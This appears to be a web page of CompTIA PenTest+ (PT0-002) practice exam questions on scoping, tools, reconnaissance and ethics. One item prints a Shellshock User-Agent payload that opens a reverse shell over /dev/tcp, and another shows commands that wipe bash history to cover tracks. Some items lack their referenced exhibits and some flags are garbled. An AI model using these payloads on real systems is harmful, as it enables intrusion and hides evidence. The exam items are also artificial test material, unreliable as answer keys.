CompTIA PT0-002 CompTIA PenTest+ Certification Exam Online Training
CompTIA PT0-002 Online Training
The questions for PT0-002 were last updated at Nov 26,2024.
- Exam Code: PT0-002
- Exam Name: CompTIA PenTest+ Certification Exam
- Certification Provider: CompTIA
- Latest update: Nov 26,2024
autonumA penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier.
Which of the following is the BEST action for the penetration tester to take?
- A . Utilize the tunnel as a means of pivoting to other internal devices.
- B . Disregard the IP range, as it is out of scope.
- C . Stop the assessment and inform the emergency contact.
- D . Scan the IP range for additional systems to exploit.
autonumWhich of the following tools would BEST allow a penetration tester to capture wireless handshakes to reveal a Wi-Fi password from a Windows machine?
- A . Wireshark
- B . EAPHammer
- C . Kismet
- D . Aircrack-ng
autonumA security company has been contracted to perform a scoped insider-threat assessment to try to gain access to the human resources server that houses PII and salary data. The penetration testers have been given an internal network starting position.
Which of the following actions, if performed, would be ethical within the scope of the assessment?
- A . Exploiting a configuration weakness in the SQL database
- B . Intercepting outbound TLS traffic
- C . Gaining access to hosts by injecting malware into the enterprise-wide update server
- D . Leveraging a vulnerability on the internal CA to issue fraudulent client certificates
- E . Establishing and maintaining persistence on the domain controller
autonumWhich of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance?
- A . Shodan
- B . Nmap
- C . WebScarab-NG
- D . Nessus
autonumA penetration tester wants to test a list of common passwords against the SSH daemon on a network device.
Which of the following tools would be BEST to use for this purpose?
- A . Hashcat
- B . Mimikatz
- C . Patator
- D . John the Ripper
autonumA penetration tester gains access to a system and establishes persistence, and then runs the following commands:
cat /dev/null > temp
touch Cr .bash_history temp
mv temp .bash_history
Which of the following actions is the tester MOST likely performing?
- A . Redirecting Bash history to /dev/null
- B . Making a copy of the user’s Bash history for further enumeration
- C . Covering tracks by clearing the Bash history
- D . Making decoy files on the system to confuse incident responders
autonumA penetration tester has prepared the following phishing email for an upcoming penetration test:
Which of the following is the penetration tester using MOST to influence phishing targets to click on the link?
- A . Familiarity and likeness
- B . Authority and urgency
- C . Scarcity and fear
- D . Social proof and greed
autonumA penetration tester is testing a new API for the company’s existing services and is preparing the following script:
Which of the following would the test discover?
- A . Default web configurations
- B . Open web ports on a host
- C . Supported HTTP methods
- D . Listening web servers in a domain
autonumA penetration tester discovers a vulnerable web server at 10.10.1.1.
The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci>& /dev/tcp/127.0.0.1/9090 0>&1”,
“Accept”: “text/html,application/xhtml+xml,application/xml”}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?
- A . exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci id;whoami”, “Accept”:
“text/html,application/xhtml+xml,application/xml”} - B . exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci>& find / -perm -4000”, “Accept”:
“text/html,application/xhtml+xml,application/xml”} - C . exploits = {“User-Agent”: “() { ignored;};/bin/sh Ci ps Cef” 0>&1”, “Accept”:
“text/html,application/xhtml+xml,application/xml”} - D . exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci>& /dev/tcp/10.10.1.1/80” 0>&1”,
“Accept”: “text/html,application/xhtml+xml,application/xml”}
autonumDuring the reconnaissance phase, a penetration tester obtains the following output:
Reply from 192.168.1.23: bytes=32 time<54ms TTL=128
Reply from 192.168.1.23: bytes=32 time<53ms TTL=128
Reply from 192.168.1.23: bytes=32 time<60ms TTL=128
Reply from 192.168.1.23: bytes=32 time<51ms TTL=128
Which of the following operating systems is MOST likely installed on the host?
- A . Linux
- B . NetBSD
- C . Windows
- D . macOS